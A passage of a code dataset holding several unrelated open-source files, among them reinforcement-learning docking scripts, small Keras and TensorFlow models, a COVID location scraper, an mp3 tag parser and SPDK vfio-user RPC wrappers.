loaded\n :param env_config: environment configuration\n :param tb_log_name: log file name of this run for tensor board\n :param timesteps_per_save: simulation timesteps before saving the model in that interval\n :param model_load_path: path of existing model, use to continue training with that model\n :return: None\n \"\"\"\n # Create environment\n env = make_gym(gym_env=gym_env, env_config=env_config) # type: BaseDocking3d\n # Init variables\n elapsed_timesteps = 0\n sim_timesteps = timesteps_per_save if timesteps_per_save else total_timesteps\n\n # # For DDPG algorithm\n # n_actions = env.action_space.shape[0]\n # action_noise = NormalActionNoise(mean=np.zeros(n_actions), sigma=0.1 * np.ones(n_actions))\n\n # Instantiate the agent\n if model_load_path is None:\n model = MODEL(policy='MlpPolicy', env=env, **agent_hyper_params)\n else:\n # Note that this does not load a replay buffer\n model = MODEL.load(model_load_path, env=env)\n\n while elapsed_timesteps < total_timesteps:\n # Train the agent\n model.learn(total_timesteps=sim_timesteps, reset_num_timesteps=False, tb_log_name=tb_log_name)\n # Taking the actual elapsed timesteps here, so the total simulation time at least will not be biased\n elapsed_timesteps = model.num_timesteps\n # Save the agent\n tmp_model_save_path = f\"{model_save_path}_{elapsed_timesteps}\"\n # This DOES NOT save the replay/rollout buffer, that is why we continue using the same model instead of\n # reloading anything in the while loop\n model.save(tmp_model_save_path)\n logger.info(f'Successfully saved model: {os.path.join(os.path.join(os.getcwd(), tmp_model_save_path))}')\n\n env.save_full_data_storage()\n return None\n\n\n# TODO\ndef predict(gym_env: str, model_path: str, MODEL: base_class = PPO, n_episodes: int = 5, render: bool = True):\n \"\"\"\n Function to visualize and evaluate the actual model on the environment\n\n :param gym_env: Registration string of gym from docking3d\n :param model_path: full path of trained agent\n :param MODEL: stable baseline model\n :param n_episodes: number of episodes to run\n :param render: boolean for render\n :return:\n \"\"\"\n env = make_gym(gym_env=gym_env, env_config=PREDICT_CONFIG) # type: BaseDocking3d\n # Load the trained agent\n # NOTE: if you have loading issue, you can pass `print_system_info=True`\n # to compare the system on which the model was trained vs the current one\n\n n_actions = env.action_space.shape[0]\n #action_noise = NormalActionNoise(mean=np.zeros(n_actions), sigma=0.1 * np.ones(n_actions))\n model = MODEL.load(model_path, env=env)\n\n # Enjoy trained agent\n obs = env.reset(seed=2)\n for i in range(n_episodes):\n done = False\n while not done:\n action, _states = model.predict(obs, deterministic=True)\n obs, rewards, done, info = env.step(action)\n if render:\n env.render(rotate_cam=True)\n if done:\n break\n env.reset()\n env.save_full_data_storage()\n\n\ndef post_analysis_directory(directory: str = \"/home/erikx3/PycharmProjects/gym_dockauv/logs\", show_full: bool = True,\n show_episode: bool = True):\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n # Capture full data pkl file\n full_path = os.path.join(directory, filename)\n if filename.endswith(\"FULL_DATA_STORAGE.pkl\") and show_full:\n full_stor = FullDataStorage()\n full_stor.load(full_path)\n full_stor.plot_rewards()\n plt.show()\n # Episode Data Storage:\n elif filename.endswith(\".pkl\") and show_episode:\n epi_stor = EpisodeDataStorage()\n epi_stor.load(full_path)\n epi_stor.plot_epsiode_states()\n epi_stor.plot_u()\n epi_stor.plot_observation()\n epi_stor.plot_rewards()\n plt.show()\n # epi_stor.plot_episode_animation(t_per_step=None, title=\"Test Post Flight Visualization\")\n\n\ndef manual_control(gym_env: str):\n \"\"\"\n Function with pygame workaround to manually fly and debug the vehicle\n\n Great for debugging purposes, since post analysis can be called on the log that is created\n\n :param gym_env: Registration string of gym from docking3d env\n \"\"\"\n import pygame\n\n # Settings:\n WINDOW_X = 600\n WINDOW_Y = 400\n # Init environment\n env = make_gym(gym_env=gym_env, env_config=MANUAL_CONFIG) # type: BaseDocking3d\n env.reset()\n done = False\n # Init pygame\n pygame.init()\n window = pygame.display.set_mode((WINDOW_X, WINDOW_Y))\n run = True\n # Init pygame text I want to use\n pygame.font.init()\n my_font = pygame.font.SysFont('Comic Sans MS', 30)\n text_title = my_font.render('Click on this window to control vehicle', False, (255, 255, 255))\n text_note = my_font.render('Note: Not real time! Press keys below.', False, (255, 255, 255))\n text_instructions1 = [\n my_font.render('Input 1 / Linear x:', False, (255, 255, 255)),\n my_font.render('Input 2 / Linear y:', False, (255, 255, 255)),\n my_font.render('Input 3 / Linear z:', False, (255, 255, 255)),\n my_font.render('Input 4 / Angular x:', False, (255, 255, 255)),\n my_font.render('Input 5 / Angular y:', False, (255, 255, 255)),\n my_font.render('Input 6 / Angular z:', False, (255, 255, 255))]\n text_instructions2 = [my_font.render('w', False, (255, 255, 255)),\n my_font.render('a', False, (255, 255, 255)),\n my_font.render('f', False, (255, 255, 255)),\n my_font.render('u', False, (255, 255, 255)),\n my_font.render('h', False, (255, 255, 255)),\n my_font.render('o', False, (255, 255, 255))]\n text_instructions3 = [my_font.render('s', False, (255, 255, 255)),\n my_font.render('d', False, (255, 255, 255)),\n my_font.render('r', False, (255, 255, 255)),\n my_font.render('j', False, (255, 255, 255)),\n my_font.render('k', False, (255, 255, 255)),\n my_font.render('l', False, (255, 255, 255))]\n # Init valid action\n action = np.zeros(6)\n valid_input_no = env.auv.u_bound.shape[0]\n while run:\n # --------- Pygame ----------\n # Text and shapes on pygame window\n window.fill((0, 0, 0)) # Make black background again\n window.blit(text_title, (0, 0))\n window.blit(text_note, (0, 30))\n pos_y = 80\n count = 0\n for text1, text2, text3 in zip(text_instructions1, text_instructions2, text_instructions3):\n window.blit(text1, (0, pos_y))\n window.blit(text2, (250, pos_y))\n window.blit(text3, (WINDOW_X - 50, pos_y))\n # Here we draw the circle based on which keyboard are pressed\n circle_x = WINDOW_X - 100 - (WINDOW_X - 100 - 300) / 2 * (action[count] + 1)\n pygame.draw.circle(window, 'green', (circle_x, pos_y + 10), 5)\n pos_y += 45\n count += 1\n # Draw a green line\n line_x = (250 + WINDOW_X - 50) / 2\n pygame.draw.line(window, 'green', (line_x, 80), (line_x, 80 + 5 * 45 + 30))\n # Update pygame window\n pygame.display.update()\n pygame.display.flip()\n\n # --------- Derive action from keyboard input ---------\n action = np.zeros(6)\n keys = pygame.key.get_pressed()\n action[0] = (keys[pygame.K_w] - keys[pygame.K_s]) * 1\n action[1] = (keys[pygame.K_a] - keys[pygame.K_d]) * 1\n action[2] = (keys[pygame.K_f] - keys[pygame.K_r]) * 1\n action[3] = (keys[pygame.K_u] - keys[pygame.K_j]) * 1\n action[4] = (keys[pygame.K_h] - keys[pygame.K_k]) * 1\n action[5] = (keys[pygame.K_o] - keys[pygame.K_l]) * 1\n\n # Get valid action, as number of inputs might be smaller than 6 for other vehicles\n valid_action = action[:valid_input_no]\n\n # Need this part below to make everything work, but also quitting\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q or event.type == pygame.QUIT:\n run = False\n\n # --------- Environment ---------\n if not done:\n # Env related stuff\n obs, rewards, done, info = env.step(valid_action)\n env.render()\n # This last call ensures, that we save a log for \"episode one\"\n else:\n env.reset()\n done = False\n # Call in case of quit\n env.reset()\n\n\ndef make_gym(gym_env: str, env_config: dict) -> BaseDocking3d:\n \"\"\"\n Wrapper to create and return gym and return error if key is wrong\n\n :param gym_env: Registration string of gym from docking3d env\n :param env_config: Config for environment\n :return:\n \"\"\"\n if gym_env in REGISTRATION_DICT:\n env = gym.make(gym_env, env_config=env_config)\n return env\n else:\n raise KeyError(f\"Not valid gym environment registration string,\"\n f\" available options are {REGISTRATION_DICT.keys()}\")\n","repo_name":"Erikx3/gym_dockauv","sub_path":"gym_dockauv/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11231,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"85"} +{"seq_id":"2807248555","text":"import numpy as np\nfrom keras.preprocessing import image\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nfrom keras.regularizers import l2\n\n# dimensions of our images.\nimg_width, img_height = 32,24\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\n# Define the model architecture\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, kernel_regularizer=l2(0.01)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nnum_classes = 4 # Change this to the number of classes\nmodel.add(Dense(num_classes))\nmodel.add(Activation('softmax'))\n\n# Load the model\nmodel.load_weights('scale_down_weights_v3.h5')\n\nimg_path = 'thermal_image_41.jpg'\nimg = image.load_img(img_path, target_size=(img_width, img_height))\n\n# Convert the image to a numpy array\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\n\nclass_labels = {'Cold': 0, 'Hot': 1, 'Neutral': 2, 'Very Hot': 3}\n\n# Predict the class of the image\ndef classify_image(image_path):\n img = image.load_img(image_path, target_size=(img_width, img_height))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])\n proba = model.predict(images, batch_size=10)\n for i, class_label in enumerate(class_labels.keys()):\n print(f\"Probability of {class_label}: {proba[0][i]}\")\n classes = np.argmax(proba, axis=-1)\n class_label = list(class_labels.keys())[list(class_labels.values()).index(classes[0])]\n return class_label\n\nprint(classify_image(img_path))","repo_name":"tanmayrainanda/ILGC-3-Project","sub_path":"scaled_down_testing.py","file_name":"scaled_down_testing.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"42332214889","text":"import numpy as np\nfrom typing import List\n\n\nclass SelectionOperator:\n def roulette_wheel(\n fitness_scores: List[float],\n n: int,\n replace: bool = False,\n epsilon: float = 0.01,\n ) -> List[int]:\n # When fitness is zero, the probability distribution may only allow\n # selection of fewer individuals than required when replace = False.\n # To solve this, we add a small epsilon. We choose 0.01 to be small\n # enough (0.5% relative to max score of 2).\n\n perturbed_fitness = np.array(fitness_scores) + epsilon\n norm_fitness_scores = perturbed_fitness / sum(perturbed_fitness)\n return np.random.choice(\n len(fitness_scores), n, p=norm_fitness_scores, replace=replace\n )\n\n def tournament(\n fitness_scores: List[float], n: int, k: int = 3, replace: bool = False\n ) -> List[int]:\n ranked_indices = np.argsort(fitness_scores)\n population = len(ranked_indices)\n parents = []\n\n for _ in range(n):\n # Must choose k different individuals\n chosen = max(\n np.random.choice(population, min(k, population), replace=False)\n )\n parents.append(ranked_indices[chosen])\n\n if not replace:\n np.delete(ranked_indices, chosen)\n population -= 1\n\n return parents\n","repo_name":"matsagad/beng-project","sub_path":"evolution/genetic/operators/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"9741630156","text":"import tensorflow as tf\nimport numpy as np\n\nfrom noise import dropout\n\n\nclass DropOutTest(tf.test.TestCase):\n\n def setUp(self):\n self.layer = dropout.Dropout()\n\n def testEqualityAcrossChannels(self):\n \"\"\" Test that samples across channels are identical \"\"\"\n\n # Test simple binary case\n input_image = tf.ones((1, 12, 12, 3))\n background_image = tf.zeros((1, 12, 12, 3))\n res = self.layer((input_image, background_image))\n channels = tf.split(res, res.shape[-1], axis=-1)\n\n with self.cached_session(use_gpu=False):\n self.assertAllEqual(channels[0], channels[1])\n self.assertAllEqual(channels[1], channels[2])\n\n def testMutabilityOnDifferentCalls(self):\n \"\"\" Confirm that different invocations of the layer\n lead to different samplings\n \"\"\"\n input_image = tf.ones((1, 1000, 1000, 1))\n background_image = tf.zeros((1, 1000, 1000, 1))\n res1 = self.layer((input_image, background_image), 0.5)\n res2 = self.layer((input_image, background_image), 0.5)\n\n with self.cached_session(use_gpu=False):\n self.assertNotAllEqual(res1, res2)\n\n def testMultipleSamplingProportions(self):\n\n with self.cached_session(use_gpu=False):\n\n input_image = tf.ones((1, 1000, 1000, 1))\n background_image = tf.zeros((1, 1000, 1000, 1))\n\n keep_probs = [0, 0.1, 0.5, 0.9, 1.0]\n\n for keep_prob in keep_probs:\n res = self.layer((input_image, background_image), keep_prob)\n total_shape = np.prod(res.shape)\n actual = tf.reduce_sum(res) / total_shape\n actual = actual.numpy()\n expected = 1.0 * keep_prob\n self.assertAlmostEqual(actual, expected, places=2)\n\nif __name__ == '__main__':\n tf.test.main(argv=None)\n","repo_name":"marco-willi/HiDDeN-tensorflow","sub_path":"tests/test_noise_dropout.py","file_name":"test_noise_dropout.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12233726770","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport time\ndef loadData():\n '''\n dataset = np.array([[1,1],[2,2],[2,0],\n [0,0],[1,0],[0,1]])\n tagset = np.array([1, 1, 1, -1, -1, -1])\n '''\n dataset = np.loadtxt(\"TrainSamples.csv\", dtype=np.float, delimiter=\",\")\n tagset = np.loadtxt(\"TrainLabels.csv\", dtype=np.float, delimiter=\",\")\n return dataset, tagset\n\ndef lmse(dataset,tagset):\n num, dim = np.shape(dataset)\n b = np.ones((num,1))* 1\n eta = 0.000001\n data_tag = dataset.copy()\n for i in range(num):\n data_tag[i] = tagset[i] * data_tag[i]\n tagset.reshape((num,1))\n data_tag = np.column_stack((tagset,data_tag))\n # print data_tag\n a = np.ones(((dim+1),1)) / (dim+1)\n if (np.linalg.det(np.dot(data_tag.T, data_tag)) < 0.01):\n a = np.dot(np.dot(np.linalg.inv(np.dot(data_tag.T, data_tag) + 0.01*np.eye((dim+1))), data_tag.T), b)\n else:\n a = np.dot(np.dot(np.linalg.inv(np.dot(data_tag.T, data_tag)), data_tag.T),b)\n # print a\n return a / a[0]\n\ndef showPlt(dataset, tagset, w):\n num = np.shape(dataset)[0]\n marker = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', ' 0:\n print(f\"Your score is {score}\")\n first = random.randint(0, 49)\n first_data = game_data.data[first]\n print(\"A:\" + first_data[\"name\"] + \",\" + first_data[\"description\"] + \",\" + first_data[\"country\"])\n second = random.randint(0, 49)\n second_data = game_data.data[second]\n print(\"B:\" + second_data[\"name\"] + \",\" + second_data[\"description\"] + \",\" + second_data[\"country\"])\n answer = input(\"Who has more followers?'A' 'or' 'B'\").lower()\n if answer == \"a\":\n if first_data[\"follower_count\"] > second_data[\"follower_count\"]:\n right = True\n score += 1\n else:\n right = False\n elif answer == \"b\":\n if first_data[\"follower_count\"] < second_data[\"follower_count\"]:\n right = True\n score += 1\n else:\n right = False\n\nprint(f\"You lost,Your final score is {score}\")\n","repo_name":"AlphaSpirit1/100-Days-of-Code","sub_path":"Day 13/Day_13.py","file_name":"Day_13.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21052222041","text":"#jonathan Kelly, 10/14/19,Jonathan.kelly2@marist.edu, create stop light using functions\n\nfrom graphics import *\n\nwin = GraphWin('traffic_light',200,200)\n\n\ndef draw_lamp(x,y,radius,color):\n light=Circle (Point (x,y), radius)\n light.setFill(color)\n light.setOutline (\"black\")\n \n light.draw(win)\n \ndef draw_light_body(x, y, length, width):\n rect= Rectangle (Point(x,y), Point(length,width))\n rect.setOutline(\"black\")\n rect.setFill(\"white\")\n \n rect.draw(win)\n \n\ndef draw_traffic_light(x,y):\n draw_light_body(x, y, 100, 160)\n draw_lamp(65, 40, 20, \"red\")\n draw_lamp(65, 85, 20, \"yellow\")\n draw_lamp(65, 130, 20, \"green\")\n \n win.getMouse()\n \ndef main():\n \n draw_traffic_light(30, 10)\n\nmain()","repo_name":"Marist-CMPT120-FA19/Jonathan-Kelly-Project6","sub_path":"Lab6.py","file_name":"Lab6.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"39322446408","text":"import time\nfrom get_list import pop_item, get_list, my_url, MOH_url\nimport logging\nfrom django.conf import settings\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\nfrom django_apscheduler import util\n\nlogger = logging.getLogger(__name__)\n\n\ndef my_job():\n current_response = get_list(my_url, \"\", \"\")\n new_response = get_list(MOH_url, \"\", \"\") \n for i in new_response:\n if \"Auckland\" in i[1]:\n if i not in current_response: \n i.insert(0, 1)\n i.append(int(time.time()))\n i = tuple(i)\n pop_item(i)\n\n\n# The `close_old_connections` decorator ensures that database connections, that have become\n# unusable or are obsolete, are closed before and after job has run.\n@util.close_old_connections\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"\n This job deletes APScheduler job execution entries older than `max_age` from the database.\n It helps to prevent the database from filling up with old historical records that are no\n longer useful.\n \n :param max_age: The maximum length of time to retain historical job execution records.\n Defaults to 7 days.\n \"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs APScheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n scheduler.add_job(\n my_job,\n trigger=CronTrigger(minute=\"*/10\"),\n id=\"my_job\", # The `id` assigned to each job MUST be unique\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\"Added job 'my_job'.\") \n\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")","repo_name":"regrimwood/auckland-CovidLOI-project","sub_path":"main/management/commands/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32355733767","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\nfrom flask import current_app, request, url_for\nfrom flask_mongoengine import MongoEngine\nfrom tradezero_pricer import db\n\n\nclass Stock(db.Document):\n #_id = db.IntegerField(required=True, primary_key=True)\n ticker = db.StringField(required=True, max_length=5, unique=True)\n name = db.StringField(required=True, max_length=40)\n price = db.FloatField(required=True, default=0.0)\n price_y = db.FloatField(required=True, default=0.0)\n volume = db.FloatField(required=True, default=0.0)\n marketcap = db.FloatField(required=True, default=0.0)\n candle_data = db.ListField(required=True, default=lambda: {})\n last_update = db.DateTimeField(required=True, default=date.today())\n\n def to_json(self):\n return {\"ticker\": self.ticker,\n \"name\": self.name,\n \"volume\": self.volume,\n \"marketcap\": self.marketcap,\n \"price\": self.price,\n \"price_y\": self.price_y,\n \"last_update\": self.last_update}\n\n def get_intraday(self):\n change = (self.price_y - self.price) / self.price_y if stock_price_y else 0.00,\n return {\"ticker\": self.ticker,\n \"variation\": change}\n\n def is_active(self):\n return True\n\n def get_ticker(self):\n return str(self.ticker)\n\n\ndef stock_factory(ticker: str, name: str, price: float, price_y: float,\n volume: float, marketcap: float, candle_data: list,\n last_update: date) -> Stock:\n '''\n Stock factory method\n '''\n if ticker in current_app.config['TICKER_WATCHLIST']:\n current_app.logger.debug(f'{ticker} is in the watchlist. Instantiating.')\n return Stock(ticker=ticker, name=name, price=price, price_y=price_y,\n volume=volume, marketcap=marketcap, candle_data=candle_data,\n last_update=_last_update)\n else:\n current_app.logger.error(f\" {ticker} not in the watchlist. Ignoring.\")\n return None\n\n\n","repo_name":"mauroseb/tradezero-pricer","sub_path":"tradezero_pricer/domain/models/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28210890392","text":"import re\nmessageList = [\n 'ข���รายงานครับ',\n 'เริ่มต้นการรายงานครับ',\n 'ขอแจ้งข่าวครับ'\n]\n\nSTART_REPORT_PATTERN = 'รายงาน|แจ้งข่าว'\nfor message in messageList:\n m = re.search(START_REPORT_PATTERN,message)\n # print(m)\n print(m.group(0))","repo_name":"mootuun/line-bot-report-assistant","sub_path":"test/regex/re01.py","file_name":"re01.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"th","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"41956211883","text":"import os\nfrom deejayd.library.parsers.audio.core import _AudioFile\n\nextensions = [\".mp3\", \".mp2\", \".aac\"]\ntry:\n from mutagen.mp3 import MP3\nexcept ImportError:\n extensions = []\n\n\nclass Mp3File(_AudioFile):\n IDS = {\n \"TIT2\": \"title\",\n \"TPE1\": \"artist\",\n \"TALB\": \"album\",\n }\n\n def parse(self, file, library):\n self.__infos = _AudioFile.parse(self, file, library)\n mp3_info = MP3(file)\n\n self.__infos.update([\n (\"title\", \"\"),\n (\"artist\", \"\"),\n (\"album\", \"\"),\n (\"tracknumber\", \"\"),\n (\"discnumber\", \"\"),\n (\"date\", \"\"),\n (\"genre\", \"\"),\n (\"replaygain_track_gain\", \"\"),\n (\"replaygain_track_peak\", \"\"),\n (\"replaygain_album_gain\", \"\"),\n (\"replaygain_album_peak\", \"\"),\n (\"length\", int(mp3_info.info.length)),\n ])\n\n tag = mp3_info.tags\n if not tag:\n self.__infos[\"title\"] = os.path.split(file)[1]\n return self.__infos\n\n for frame in list(tag.values()):\n if frame.FrameID == \"RVA2\": # replaygain\n self.__process_rg(frame)\n continue\n elif frame.FrameID == \"TCON\": # genre\n self.__infos[\"genre\"] = frame.genres[0]\n continue\n elif frame.FrameID == \"TDRC\": # date\n d_list = [stamp.text for stamp in frame.text]\n self.__infos[\"date\"] = d_list[0]\n continue\n elif frame.FrameID == \"TRCK\": # tracknumber\n self.__infos[\"tracknumber\"] = self._format_number(frame.text[0])\n elif frame.FrameID == \"TPOS\": # discnumber\n self.__infos[\"discnumber\"] = self._format_number(frame.text[0])\n elif frame.FrameID in list(self.IDS.keys()):\n self.__infos[self.IDS[frame.FrameID]] = frame.text[0]\n elif frame.FrameID == \"APIC\": # picture\n if frame.type == 3: # album front cover\n self.__infos[\"cover\"] = {\n \"data\": frame.data,\n \"mimetype\": frame.mime\n }\n else:\n continue\n\n return self.__infos\n\n def __process_rg(self, frame):\n if frame.channel == 1 and frame.desc in (\"track\", \"album\"):\n self.__infos[\"replaygain_%s_gain\" % frame.desc] = \"%+f dB\" % frame.gain\n self.__infos[\"replaygain_%s_peak\" % frame.desc] = str(frame.peak)\n\n\nobject = Mp3File\n","repo_name":"niol/deejayd","sub_path":"deejayd/library/parsers/audio/mp3.py","file_name":"mp3.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"37042154854","text":"def vfu_tgt_set_base_path(client, path):\n \"\"\"Set socket base path.\n\n Args:\n path: base path\n \"\"\"\n params = {\n 'path': path\n }\n\n return client.call('vfu_tgt_set_base_path', params)\n\n\ndef vfu_virtio_delete_endpoint(client, name):\n \"\"\"Delete specified endpoint name.\n\n Args:\n name: endpoint name\n \"\"\"\n params = {\n 'name': name\n }\n\n return client.call('vfu_virtio_delete_endpoint', params)\n\n\ndef vfu_virtio_create_blk_endpoint(client, name, bdev_name, cpumask, num_queues, qsize, packed_ring):\n \"\"\"Create virtio-blk endpoint.\n\n Args:\n name: endpoint name\n bdev_name: name of block device\n cpumask: CPU core mask\n num_queues: number of vrings\n qsize: number of element of each vring\n packed_ring: enable packed ring\n \"\"\"\n params = {\n 'name': name,\n 'bdev_name': bdev_name\n }\n if cpumask:\n params['cpumask'] = cpumask\n if num_queues:\n params['num_queues'] = num_queues\n if qsize:\n params['qsize'] = qsize\n if packed_ring:\n params['packed_ring'] = packed_ring\n\n return client.call('vfu_virtio_create_blk_endpoint', params)\n\n\ndef vfu_virtio_scsi_add_target(client, name, scsi_target_num, bdev_name):\n \"\"\"Attach a block device to the specified SCSI target.\n\n Args:\n name: endpoint name\n scsi_target_num: SCSI target number\n bdev_name: name of block device\n \"\"\"\n params = {\n 'name': name,\n 'scsi_target_num': scsi_target_num,\n 'bdev_name': bdev_name\n }\n\n return client.call('vfu_virtio_scsi_add_target', params)\n\n\ndef vfu_virtio_scsi_remove_target(client, name, scsi_target_num):\n \"\"\"Remove specified SCSI target of socket endpoint.\n\n Args:\n name: endpoint name\n scsi_target_num: SCSI target number\n \"\"\"\n params = {\n 'name': name,\n 'scsi_target_num': scsi_target_num\n }\n\n return client.call('vfu_virtio_scsi_remove_target', params)\n\n\ndef vfu_virtio_create_scsi_endpoint(client, name, cpumask, num_io_queues, qsize, packed_ring):\n \"\"\"Create virtio-scsi endpoint.\n\n Args:\n name: endpoint name\n cpumask: CPU core mask\n num_io_queues: number of IO vrings\n qsize: number of element of each vring\n packed_ring: enable packed ring\n \"\"\"\n params = {\n 'name': name,\n }\n if cpumask:\n params['cpumask'] = cpumask\n if num_io_queues:\n params['num_io_queues'] = num_io_queues\n if qsize:\n params['qsize'] = qsize\n if packed_ring:\n params['packed_ring'] = packed_ring\n\n return client.call('vfu_virtio_create_scsi_endpoint', params)\n","repo_name":"spdk/spdk","sub_path":"python/spdk/rpc/vfio_user.py","file_name":"vfio_user.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"83"} +{"seq_id":"18253295785","text":"import os\nfrom aiohttp import client\nfrom discord.ext import commands\nimport lavapy\nbot = commands.Bot(command_prefix=\"!\")\nfrom dotenv import load_dotenv\nfrom lavapy.ext import spotify\n\nload_dotenv()\n\nasync def initialiseNodes():\n \"\"\"\n Wait until the bot is ready then create a Lavapy node\n \"\"\"\n await bot.wait_until_ready()\n await lavapy.NodePool.createNode(client=bot,\n host=\"localhost\",\n port=2333,\n password=\"youshallnotpass\",\n spotifyClient=spotify.SpotifyClient(os.getenv(\"clientId\"), os.getenv(\"clientSecret\")))\n\n\n@bot.command()\nasync def play(ctx: commands.Context, *query) -> None:\n \"\"\"\n Play a Youtube song from a given search query.\n\n If the bot is not connected, connect it to the user's voice channel. For this\n to work, the user must be connected to a voice channel\n \"\"\"\n if not ctx.voice_client:\n # Bot is not connected to a voice channel\n try:\n player: lavapy.Player = await ctx.author.voice.channel.connect(cls=lavapy.Player)\n except AttributeError:\n # User is not connected to a voice channel\n await ctx.channel.send(\"You must be connected to a voice channel\")\n return\n else:\n # Bot is connected to a voice channel\n player: lavapy.Player = ctx.voice_client\n # Parse URL to see what to play\n if query[0].startswith(\"https://www.youtube.com/watch?v=\"):\n # Play a Youtube video\n track = await lavapy.YoutubeTrack.search(query[0], player.node)\n elif query[0].startswith(\"https://open.spotify.com/track/\"):\n # Play a Spotify track\n track = await spotify.SpotifyTrack.search(query[0], player.node)\n else:\n # Search for a Youtube video\n track = await lavapy.SoundcloudTrack.search(query[0], player.node)\n await player.play(track)\n\n\n@bot.command()\nasync def pause(ctx: commands.Context) -> None:\n \"\"\"\n Pause the current track.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.pause()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n@bot.command()\nasync def resume(ctx: commands.Context) -> None:\n \"\"\"\n Resume the current track.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.resume()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n\n@bot.command()\nasync def stop(ctx: commands.Context) -> None:\n \"\"\"\n Stop the current track.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.stop()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n@bot.command()\nasync def disconnect(ctx: commands.Context) -> None:\n \"\"\"\n Disconnect the bot from the voice channel.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.disconnect()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n@bot.command()\nasync def volume(ctx: commands.Context, volume: int) -> None:\n \"\"\"\n Change the volume of the bot.\n \"\"\"\n if ctx.voice_client:\n ctx.voice_client.volume = volume\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n\nbot.loop.create_task(initialiseNodes())\nbot.run(os.getenv(\"token\"))\n","repo_name":"AuraudZ/discord-spotify-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35283134338","text":"#!/usr/bin/env python3\n# coding=UTF-8\n'''\nDate: 2021-12-06 21:53:46\nLastEditTime: 2021-12-13 01:13:39\nDescription: file content\n'''\nfrom app.HNOX_Pred.run_function import *\nfrom app.HNOX_Pred.color_assigning import *\nfrom app.HNOX_Pred.json_output import *\nimport os\n\n\ndef run(path_result, hash, input_text):\n if not os.path.exists(path_result):\n os.makedirs(path_result)\n # dataframe initialization of template for raw output\n raw_output_template = pd.DataFrame({\n 'Hit-No': [0],\n 'Position Start': [0],\n 'Position End': [0],\n 'Sequence': [0],\n 'Hydrophobicity': [0],\n 'Molecular Weight': [0],\n 'Isoelectric Point': [0],\n 'Mean': [0],\n 'Header': ['']\n })\n\n # For txt file as input\n # f_path = 'txt Input/H-NOX (true).txt'\n f_path = os.path.join(os.path.abspath(\n os.path.dirname(__file__)), \"txt Input\", f\"{hash}.txt\")\n with open(f_path, 